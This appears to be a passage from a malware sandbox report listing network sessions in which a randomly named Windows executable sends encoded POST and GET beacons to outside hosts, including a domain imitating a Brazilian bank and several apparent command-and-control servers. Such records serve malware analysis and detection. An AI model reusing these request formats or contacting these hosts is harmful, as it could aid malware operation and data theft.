9d b8 46 a1 e7 9c 23 49 05 57 3a 54 ca cf 77 5d 9b 90 66 95 94 63 51 6a 52 24 1a 13 [TRUNCATED] Data Ascii: 26FTMs0WPv$1J'qOb_2BR0/LL: [\|QBn)-PW/?(rC1PA!L3"pE^R&=^{H4`DU;oLD;bLH5(SI!e2LItERC[=%)NE2U<74hRI&8]8*8s@JH{)Y%F#IW:Tw]fcQjR$ZX7E=H/JG0O~9<6fcjj+ASd8im/zm\|SrN2Zx(}gQPAKcB:ff}mL"#2B4yf!"K;X.", #3o}W3_fo9z0J/ ^x[aGwoDP/w7_N}#7)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49994	72.14.178.174	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:46.356448889 CEST	512	OUT	GET /wouj/?1Dd0AZ=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reRgx2ev+oO3VaoDEPpI9NdXcV24A2tAPhqcySUcuIIvkh6g==&-n1P=0hFdS6 HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:29:46.883507967 CEST	1236	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Wed, 09 Oct 2024 14:29:46 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 42 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED] Data Ascii: 4BD<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1728484186.0038568114&other_args=eyJ1cmkiOiAiL3dvdWoiLCAiYXJncyI6ICIxRGQwQVo9eVdZQi9SM3dEckRNZ3Y3LzJoM21SMzZTdmhidjhnSERxYlRPN2xLaWtPRWF1d0FheU14c2NkODllOXo0SlVTRmtrR3l5ZkJzdlRNdHNKd043N3JlUmd4MmV2K29PM1Zhb0RFUHBJOU5kWGNWMjRBMnRBUGhxY3lTVWN1SUl2a2g2Zz09Ji1uMVA9MGhGZFM2IiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBw [TRUNCATED]
Oct 9, 2024 16:29:46.883553028 CEST	145	IN	Data Raw: 4c 47 6c 74 59 57 64 6c 4c 32 46 77 62 6d 63 73 4b 69 38 71 4f 33 45 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 35 6e 5a 54 74 32 50 57 49 7a 4f 33 45 39 4d 43 34 33 49 6e Data Ascii: LGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49995	103.144.219.16	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:53.106057882 CEST	768	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 55 69 50 30 37 31 4f 37 63 44 4f 70 4d 54 45 30 64 4f 35 68 58 4f 58 55 70 72 47 74 52 54 79 43 65 39 50 33 54 41 4c 66 34 61 4d 45 4f 39 43 39 79 65 51 73 6e 35 35 49 74 33 63 6d 6c 71 67 70 41 49 5a 48 6b 59 54 4f 76 4d 76 32 6d 6b 36 46 4d 30 62 6a 69 4d 6f 2f 78 33 6b 64 36 62 71 32 43 56 38 36 68 4f 69 76 74 72 39 7a 74 65 73 6a 68 69 6d 66 36 69 4a 6f 46 53 64 4c 47 6c 6d 41 43 52 33 51 6a 63 46 77 6c 6d 51 5a 61 54 45 6e 46 6c 39 74 31 79 67 33 6c 35 32 67 4c 4a 58 64 4b 48 4b 64 41 50 73 41 44 6c 78 2b 6c 55 66 62 67 59 45 6d 6e 43 39 6b 45 78 38 3d Data Ascii: 1Dd0AZ=VjsjL/bPE2x3UiP071O7cDOpMTE0dO5hXOXUprGtRTyCe9P3TALf4aMEO9C9yeQsn55It3cmlqgpAIZHkYTOvMv2mk6FM0bjiMo/x3kd6bq2CV86hOivtr9ztesjhimf6iJoFSdLGlmACR3QjcFwlmQZaTEnFl9t1yg3l52gLJXdKHKdAPsADlx+lUfbgYEmnC9kEx8=
Oct 9, 2024 16:29:53.999361038 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:29:53 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49996	103.144.219.16	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:55.647296906 CEST	788	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 53 42 6e 30 35 57 57 37 55 44 4f 6d 43 7a 45 30 58 75 35 36 58 4f 62 55 70 71 43 39 51 68 57 43 62 6f 4c 33 63 69 7a 66 37 61 4d 45 58 4e 43 34 76 75 51 7a 6e 34 46 41 74 32 67 6d 6c 71 30 70 41 4b 42 48 6b 70 54 42 75 63 76 30 75 45 36 62 49 30 62 6a 69 4d 6f 2f 78 7a 4e 56 36 66 4f 32 43 6c 4d 36 67 72 43 67 75 72 39 73 6b 2b 73 6a 6c 69 6d 62 36 69 4a 77 46 58 30 6b 47 6e 75 41 43 51 48 51 6a 4f 39 76 2f 32 52 53 55 7a 46 73 56 67 4d 46 74 46 41 43 36 50 72 30 59 5a 75 67 50 78 6e 33 61 74 6b 6f 51 46 64 47 31 48 58 73 78 6f 6c 50 39 68 74 55 61 6d 70 73 47 45 57 47 6e 69 69 50 65 63 69 42 53 4e 38 4c 53 36 58 71 Data Ascii: 1Dd0AZ=VjsjL/bPE2x3SBn05WW7UDOmCzE0Xu56XObUpqC9QhWCboL3cizf7aMEXNC4vuQzn4FAt2gmlq0pAKBHkpTBucv0uE6bI0bjiMo/xzNV6fO2ClM6grCgur9sk+sjlimb6iJwFX0kGnuACQHQjO9v/2RSUzFsVgMFtFAC6Pr0YZugPxn3atkoQFdG1HXsxolP9htUampsGEWGniiPeciBSN8LS6Xq
Oct 9, 2024 16:29:56.513808966 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:29:56 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49997	103.144.219.16	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:58.196561098 CEST	1805	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 53 42 6e 30 35 57 57 37 55 44 4f 6d 43 7a 45 30 58 75 35 36 58 4f 62 55 70 71 43 39 51 68 65 43 62 36 44 33 54 6a 7a 66 36 61 4d 45 66 74 43 35 76 75 52 76 6e 35 74 45 74 32 73 59 6c 6f 4d 70 61 76 56 48 69 64 50 42 6b 63 76 30 69 6b 36 61 4d 30 62 79 69 4d 35 32 78 33 52 56 36 66 4f 32 43 6e 45 36 77 4f 69 67 69 4c 39 7a 74 65 73 2f 68 69 6d 6a 36 69 52 67 46 58 35 62 47 32 4f 41 42 7a 2f 51 6d 37 52 76 30 32 52 51 45 6a 46 2f 56 67 49 61 74 45 6f 34 36 50 32 70 59 61 2b 67 4e 68 69 50 4a 65 6b 70 45 6b 78 39 32 32 44 2b 6a 38 70 54 37 78 6f 68 52 56 38 50 4b 57 47 73 69 55 65 53 55 75 72 50 52 71 41 65 63 38 6d 35 7a 66 6d 76 50 43 4c 39 34 6d 79 47 43 72 49 4f 55 4f 68 56 50 50 76 37 37 6e 49 51 48 2b 62 77 51 70 6d 42 5a 48 65 58 36 32 6d 72 4f 76 4f 33 4a 77 67 45 4e 30 4e 55 51 6e 7a 33 62 63 49 4b 36 6a 2f 66 42 50 48 77 36 37 55 64 72 53 52 79 34 63 37 47 4d 62 35 59 75 53 30 75 2b 46 4f 50 6d 49 41 66 78 35 38 74 64 35 36 63 41 6a 76 [TRUNCATED] Data Ascii: 1Dd0AZ=VjsjL/bPE2x3SBn05WW7UDOmCzE0Xu56XObUpqC9QheCb6D3Tjzf6aMEftC5vuRvn5tEt2sYloMpavVHidPBkcv0ik6aM0byiM52x3RV6fO2CnE6wOigiL9ztes/himj6iRgFX5bG2OABz/Qm7Rv02RQEjF/VgIatEo46P2pYa+gNhiPJekpEkx922D+j8pT7xohRV8PKWGsiUeSUurPRqAec8m5zfmvPCL94myGCrIOUOhVPPv77nIQH+bwQpmBZHeX62mrOvO3JwgEN0NUQnz3bcIK6j/fBPHw67UdrSRy4c7GMb5YuS0u+FOPmIAfx58td56cAjv5dyc423618wEcqRGncplVfgfVwmjvaG94R+vbepvP0TTeI03U/Oc9fXI5byBh8isKs6O3rWic2SoBSvpgopOB3xAzri81VKjQ/t+h0MpzEg/oEDHiNH/c7iB2ctqNrW7DNO8so/CQIBXntvXiOuUXQczWYd1ZnPl/IjxQgQesD3hVl4RxY5Yvgw2idmKFCjJiS3bDeTU9CZpZmzR9laeoRumFAe4i50nN25HhLuDEmp8WXNsaS8SY4Gw6Tqa8rFAGpztV88bZkUJmXfxJToWqSdquco9HTR4HU3oZkIhONJ6Slfz/FEdlFRHtus6h/STUYP1pQMhcBUOv5zaoJegxYIj4fsL+plqm+LaTVyqa5yBNgiM9rc+OxKke9c2wUJDvnsY+dsY3Af3wIWaEqgzEwWlkUPR19BWx2BkeiKqsY0bq04bGAujRlL+bimsU0/aZDBV360amg8hTHuYanp71Craf+q0XtlIEFX1KpVOBcTPZxSsFyKSWfwPVxxxfGF6GUaAHLXOUFEZLXzk1rSoEL0tAtRxUYla9BEeBEVg01cGHivXF+M1nIGo9xvFReZdUkN6RwM6nOc9FqdfSPpAfkM0q1LqXzAWSqBs+b5yXzFbUf54zzrq8srFI8F1IA0nCYk28BEBaIDmmORVBSxRqmqNZyF+e5n/AU [TRUNCATED]
Oct 9, 2024 16:29:59.090372086 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:29:58 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49998	103.144.219.16	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:00.909903049 CEST	504	OUT	GET /4qyv/?1Dd0AZ=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNmc3S9meoJwD5mOlZ7ywSk7a0PFA/uq20of9/npEWtw3ogQ==&-n1P=0hFdS6 HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:30:01.814146042 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:01 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49999	84.32.84.32	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:07.186885118 CEST	780	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 4d 74 4e 49 58 4d 37 47 72 34 31 55 32 4c 44 31 73 32 46 69 6d 4b 54 49 39 57 6c 37 38 6e 4c 65 6c 59 71 43 6b 32 34 6f 39 2b 47 66 68 38 62 74 31 47 38 59 78 2b 30 5a 75 4e 31 49 38 6b 56 7a 67 36 35 6e 37 34 64 42 41 42 6e 70 67 6c 66 6f 31 39 6e 6c 38 4b 42 53 2f 53 63 56 6c 52 77 79 7a 49 6f 45 61 72 71 6f 41 71 39 55 57 70 64 70 36 77 36 75 46 35 68 61 6a 4a 34 33 69 4c 46 39 4b 6d 51 7a 4b 78 32 6c 43 65 4a 6c 72 79 51 6d 46 59 70 70 50 46 6e 68 2b 49 63 76 77 78 4a 34 65 4a 63 6e 76 62 78 54 42 66 7a 4c 53 31 2b 2b 78 46 6c 51 77 4e 57 4e 67 74 45 3d Data Ascii: 1Dd0AZ=zriPQK61Yc4nMtNIXM7Gr41U2LD1s2FimKTI9Wl78nLelYqCk24o9+Gfh8bt1G8Yx+0ZuN1I8kVzg65n74dBABnpglfo19nl8KBS/ScVlRwyzIoEarqoAq9UWpdp6w6uF5hajJ43iLF9KmQzKx2lCeJlryQmFYppPFnh+IcvwxJ4eJcnvbxTBfzLS1++xFlQwNWNgtE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50000	84.32.84.32	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:09.828490973 CEST	800	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 44 74 64 49 55 72 58 47 70 59 31 58 6f 62 44 31 69 6d 45 70 6d 4b 66 49 39 58 52 4e 38 52 54 65 6d 38 75 43 32 6c 67 6f 2b 2b 47 66 70 63 61 6d 36 6d 38 54 78 2b 77 52 75 49 4e 49 38 6b 42 7a 67 34 78 6e 37 50 70 47 42 52 6e 72 31 31 66 71 6f 4e 6e 6c 38 4b 42 53 2f 53 49 2f 6c 51 59 79 7a 38 55 45 49 4a 53 72 4a 4b 39 58 56 70 64 70 2b 77 36 71 46 35 68 34 6a 4e 68 2f 69 4f 5a 39 4b 6e 67 7a 4b 6b 4b 69 4d 65 4a 6a 6c 53 52 6d 42 6f 55 57 43 58 7a 41 79 35 39 74 6d 51 4e 61 62 2f 78 4e 31 35 35 37 53 2f 66 7a 43 6d 32 4a 67 31 45 35 71 75 47 39 2b 36 51 50 4d 45 39 45 6b 45 4c 51 42 61 33 6d 2f 36 55 30 57 77 44 79 Data Ascii: 1Dd0AZ=zriPQK61Yc4nDtdIUrXGpY1XobD1imEpmKfI9XRN8RTem8uC2lgo++Gfpcam6m8Tx+wRuINI8kBzg4xn7PpGBRnr11fqoNnl8KBS/SI/lQYyz8UEIJSrJK9XVpdp+w6qF5h4jNh/iOZ9KngzKkKiMeJjlSRmBoUWCXzAy59tmQNab/xN1557S/fzCm2Jg1E5quG9+6QPME9EkELQBa3m/6U0WwDy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50001	84.32.84.32	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:12.683037996 CEST	1817	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 44 74 64 49 55 72 58 47 70 59 31 58 6f 62 44 31 69 6d 45 70 6d 4b 66 49 39 58 52 4e 38 52 72 65 6c 50 6d 43 6b 55 67 6f 2f 2b 47 66 6f 63 62 68 36 6d 38 30 78 2b 49 56 75 49 4a 32 38 6d 35 7a 6d 64 6c 6e 35 39 42 47 59 42 6e 72 71 46 66 72 31 39 6e 77 38 4b 52 65 2f 53 59 2f 6c 51 59 79 7a 39 45 45 65 72 71 72 4c 4b 39 55 57 70 64 39 36 77 36 47 46 34 4a 43 6a 4e 73 64 69 61 56 39 4b 48 77 7a 4d 53 65 69 45 65 4a 68 6f 79 52 49 42 6f 59 33 43 58 2f 79 79 35 5a 54 6d 58 42 61 5a 6f 30 67 74 36 51 6c 42 5a 50 53 53 33 6d 30 31 79 30 79 68 2b 61 78 39 34 6b 51 4d 67 68 50 73 52 54 39 58 6f 79 73 38 4e 6f 59 54 57 69 52 59 6a 4f 51 77 38 42 39 46 61 33 53 4f 6f 58 58 75 5a 59 49 35 4c 50 70 54 63 4a 53 38 35 78 75 68 42 48 4e 68 56 62 67 4c 42 51 35 61 57 75 34 77 50 53 79 37 78 65 55 43 68 73 56 4a 67 76 4f 4a 69 2b 63 6a 6d 4d 76 51 59 62 46 30 2b 61 74 53 36 2f 65 54 37 44 4e 41 30 72 54 52 43 6e 36 68 6d 51 47 43 43 72 71 4f 52 31 63 74 33 6b [TRUNCATED] Data Ascii: 1Dd0AZ=zriPQK61Yc4nDtdIUrXGpY1XobD1imEpmKfI9XRN8RrelPmCkUgo/+Gfocbh6m80x+IVuIJ28m5zmdln59BGYBnrqFfr19nw8KRe/SY/lQYyz9EEerqrLK9UWpd96w6GF4JCjNsdiaV9KHwzMSeiEeJhoyRIBoY3CX/yy5ZTmXBaZo0gt6QlBZPSS3m01y0yh+ax94kQMghPsRT9Xoys8NoYTWiRYjOQw8B9Fa3SOoXXuZYI5LPpTcJS85xuhBHNhVbgLBQ5aWu4wPSy7xeUChsVJgvOJi+cjmMvQYbF0+atS6/eT7DNA0rTRCn6hmQGCCrqOR1ct3ky/Uq99J0Gl/L+0s49y8oHoXSDBDIJWZx3Lo9a1va+l2btssn2HOm+dt/AIddCHwDKeXSm6InYkCm/iNJi5x+gnHzXv7wLMbZX6PXIwZKPoohtdLjCSOW09IKwLBGpiWOWslY9B7cIeoHpHXrLA4CccyWE9IZCOeXgbtG70o2Y0Wkyfua+zHiejTCKcf0byyQjUWPPef47GxUJWh8RnByr6PY1u0YwfTzl1j6w5LX5S4Ri+k0NY3loas4IFdoz4Ps1QC2v14+brQWB3wPYCpP5q3mHW3OMzhYzUQAtGFIxfOD/E63etO90vs5Mobd9t6tazrf9VxsDp7jIyzkUZ8VTsWI3O6gqp1+xCG3mCe0o6vIAZqcznsQJokHmjSPgNt7blj352JK8mkvO3xnll4iynlgvb2QDY4qEb8VHvQ+NMhENtVlazJrp/VryoE46wKSj28hVT4G1cckoW6krOuifoiFySSwC6j0D1DL40T8RxBpxpcvKoii1W4c8JtK93kdX1ZjUnOJUooZfUwE40fg19tKAsL3Z0/6nmbOyROgpplYmNrmsb2Zg1ZYW1THweHapYZE4Ds4V4QzD3YFriSFSqSJwTcBM01euwXXIGBj1jwTRn0lgyKnhrqlru3R68WHW7B7CMKDddqAGG7CKX9k65d3AUHIAxt3It [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50002	84.32.84.32	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:15.224257946 CEST	508	OUT	GET /rk2p/?-n1P=0hFdS6&1Dd0AZ=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGGgbX0HHEn//toJhu4nkHjRxJ0fg9XMahDIpubfdL/wf/HQ== HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
